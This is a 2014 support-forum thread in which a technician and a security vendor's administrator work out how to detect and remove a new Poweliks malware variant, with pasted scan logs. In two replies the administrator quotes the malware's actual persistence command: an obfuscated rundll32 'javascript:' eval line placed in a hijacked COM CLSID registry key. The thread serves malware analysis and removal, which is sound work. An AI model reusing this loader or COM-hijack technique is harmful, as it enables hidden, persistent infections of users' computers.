Author Topic: New Poweliks variant  (Read 14520 times)

0 Members and 1 Guest are viewing this topic.

September 13, 2014, 07:33:33 pm

Powdermnky007

  • Guest
New Poweliks variant
« on: September 13, 2014, 07:33:33 pm »
Hi, I have a new variant of poweliks / dllhost com surrogate virus.  It installed a new version of gigaclicks, I think it was called webcrawler. I think the CPU had 50+ GB of temp Internet files.

I have removed all the superficial viruses and spyware and am left with this new variant I am unable to find or kill.  I've been removing viruses for pay for 10+ years. This is the most advanced, well written, virus I've ever seen.

I was hoping to work with you to help your program remove this new variant and I'm also willing to make a donation to you.

I've already run ccleaner, mbam, superantispyware, roguekiller, spybot, eset, MBR scanners, gmer, combofix, adwremover, jrt.  I've done sleuthing with process monitor, process explorer, all my normal tricks, but this is one for the experts. Way over my head.  I will get some log files posted for you soon. I'm typing this on the ipad.

Reply #1September 13, 2014, 10:19:45 pm

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #1 on: September 13, 2014, 10:19:45 pm »
1st scan log with roguekiller (after running several other scans first.



RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User :  [Admin rights]
Mode : Scan -- Date : 09/12/2014  15:16:31

Bad processes : 2
[Proc.Svchost] svchost.exe -- C:\Windows\SysWOW64\svchost.exe
  • -> [NoKill]
[Tr.Poweliks] dllhost.exe --
  • -> KILLED [TermProc]


Registry Entries : 32
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68  -> FOUND
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> FOUND
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> FOUND
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms}  -> FOUND
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms}  -> FOUND
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\classes\clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} -> FOUND

Scheduled tasks : 0

Files : 0

HOSTS File : 0

Antirootkit : 0 (Driver: NOT LOADED [0xc000036b])

Web browsers : 0

MBR Check :
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] 1f89d61a65b5bd72e00aa30170dbe9fd
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 3820 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )

« Last Edit: September 20, 2014, 06:42:24 pm by Powdermnky007 »

Reply #2September 13, 2014, 10:22:09 pm

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #2 on: September 13, 2014, 10:22:09 pm »
This is the results from a scan I did JUST NOW, after ALL my cleaning efforts and several runs of roguekiller.  It still has the dllhost com surrogate thing going on.  22 threads of it active in the task manager right now.  I've cleaned all the easy to identify viruses off this computer and am now left with the mother of all viruses lol.


RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : [Admin rights]
Mode : Remove -- Date : 09/13/2014  15:14:44

Bad processes : 2
[Suspicious.Path] (SVC) SASDIFSV -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS
  • -> STOPPED
[Suspicious.Path] (SVC) SASKUTIL -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS
  • -> STOPPED


Registry Entries : 34
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1  -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992  -> NOT SELECTED
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0  -> NOT SELECTED
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0  -> NOT SELECTED
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> NOT SELECTED
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page :   -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page :   -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> NOT SELECTED

Scheduled tasks : 0

Files : 0

HOSTS File : 1
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost

Antirootkit : 0 (Driver: LOADED)

Web browsers : 0

MBR Check :
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] 3477aeb1e884f96c7d3d5d59049f1b1f
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 15268 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )


============================================
RKreport_DEL_09122014_151650.log - RKreport_DEL_09122014_160623.log - RKreport_DEL_09122014_210551.log - RKreport_SCN_09122014_151631.log
RKreport_SCN_09122014_160500.log - RKreport_SCN_09122014_210510.log - RKreport_SCN_09132014_102907.log
« Last Edit: September 20, 2014, 06:43:34 pm by Powdermnky007 »

Reply #3September 15, 2014, 12:25:04 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #3 on: September 15, 2014, 12:25:04 am »
hello
Do you know where it resides?

Reply #4September 15, 2014, 03:50:14 am

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #4 on: September 15, 2014, 03:50:14 am »
No sir.  I have NO idea.  Nothing can find it.  I even booted up into a win 8.1 PE and ran roguekiller with the honey module.  Nada.

If possible I would like to work with you, to help your program be able to remove this new variant.  Once it gets to this level, it's over my head.  Need someone like you to help!  Just let me know what you want me to do, or if you have time to pursue.  Thank you!

Reply #5September 17, 2014, 08:28:23 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #5 on: September 17, 2014, 08:28:23 am »
Ok, let's start with a OTL log please: http://oldtimer.geekstogo.com/OTL.exe
Let all by default, and run the scan.
Attach the report here.


Reply #6September 17, 2014, 05:56:12 pm

nerf8cnt48569

  • Guest
Re: New Poweliks variant
« Reply #6 on: September 17, 2014, 05:56:12 pm »
Powermnky007 has the same problem I have with this new variant of "Poweliks".  It just keeps eating up HD space until windows reports, "Low disk space on c:".  All I know that in the "Auto Start" area in the Registry, there is a non-ascii value that cannot be removed wich contains some wierd characters wich is a "Java" script that start the whole process rolling by calling up rundll32 wich envokes a "Powershell" script and things get worse from there!  Malwarebytes reports (2) entries in the registry which it labels as "Poweliks" and said that it removed it but uon reboot, it is there again!  I'm going to try whatever it takes to get rid of this thing so hopefully someone - somewhere might have some answers as far as getting rid of this infection for good!

Reply #7September 18, 2014, 07:01:11 am

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #7 on: September 18, 2014, 07:01:11 am »
worked on the computer all night again tonight...  what a waste.  Nothing can detect this thing. 

internet explorer is broken
windows installer is broken
entries disappearing from start menu
OTL will not open, I get "Exception EOIeSysError in module OTL.exe at b000584A5. Class not registered.  I tried 'run as admin' and even googled the error, but no solutions.  I believe whatever libraries it uses to run have become damaged.

Even if I do get this virus off, the computer is trashed.  I'm probably going to give it another night or two with you, then reformat.

I used FRST or Farbar Recovery Scan Tool and found the following entries which are very suspicious.  I attached the log file in it's entirety.


2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0


Reply #8September 18, 2014, 07:43:38 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #8 on: September 18, 2014, 07:43:38 am »
Ok, anyone who can paste any information on this would be useful.

Quote
All I know that in the "Auto Start" area in the Registry, there is a non-ascii value that cannot be removed wich contains some wierd characters wich is a "Java" script that start the whole process rolling by calling up rundll32 wich envokes a "Powershell" script and things get worse from there!

Can you paste the content here?
RogueKillerCMD is able to remove that run key by using the removal by index, but detecting the key would be better.

http://www.adlice.com/poweliks-removal-with-roguekiller/


Reply #9September 18, 2014, 01:43:07 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #9 on: September 18, 2014, 01:43:07 pm »
Hello
I have some good news :)

I've found a dropper for that new variant, and indeed a few changes:

- No more RUN key.
- No more HKCU clsid payload, now it's overwriting the same clsid, but in HKLM/HKCR. So there's a loss of windows system data.
- The javascript value has been modified, the content is now obfuscated.

The key is here:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32
* <unicode named subkey>
* default value: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
* a: <encrypted payload>

The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe


----------------

Effects:

- At each COM call, instead of having svchost ComLauncher process to call wmiprvse, we call the javascript command, and the infection.
- All COM calls are broken (RogueKiller was hanging on it, but it's now fixed)
- We can't kill the ComLauncher process, just restore the registry key.


I'm building a new version of RogueKiller that fixes it.

Reply #10September 18, 2014, 03:28:26 pm

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #10 on: September 18, 2014, 03:28:26 pm »
Wow that's seriously impressive.  I have no idea how you figured that out.  In my digging last night I found someone else in another forum with the javascript being called from a clsid, just like in your example below.

I did a quick registry search for "javascript:" but no infected keys showed up.  I also opened "Autoruns" to check all the start up entries, and again nothing there. BUT if I remember correctly, when I clicked on one of the tabs I got an error.  I think it was the WMI tab.

If there is anything you want me to check, post here, run a beta roguekiller, anything, just let me know.

Reply #11September 18, 2014, 03:41:48 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #11 on: September 18, 2014, 03:41:48 pm »
RogueKiller new version is online. Please try it.
It can't be in Autoruns, since it's a COM DLL hijack, not a classic autorun entry (a bit like a previous ZeroAccess variant)

Reply #12September 18, 2014, 04:24:57 pm

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #12 on: September 18, 2014, 04:24:57 pm »
At work now, I'll be home and able to try the new program in about 10 hours.  I'll post here when complete.

Will RogueKiller automatically repair The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe

Or is that something I will need to manually do?
« Last Edit: September 18, 2014, 04:27:38 pm by Powdermnky007 »

Reply #13September 18, 2014, 05:18:56 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 768
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: New Poweliks variant
« Reply #13 on: September 18, 2014, 05:18:56 pm »
Nop it will. On my test VM:

Quote
[Tr.Poweliks] HKEY_LOCAL_MACHINE\Software\classes\clsid\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32 |  : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))  -> REPLACED (C:\WINDOWS\system32\wbem\wmiprvse.exe)

Reply #14September 19, 2014, 12:30:48 am

Powdermnky007

  • Guest
Re: New Poweliks variant
« Reply #14 on: September 19, 2014, 12:30:48 am »
Still didn't find anything on mine.  I'm wondering if the Poweliks is gone and now my system is just trashed, should I just reformat?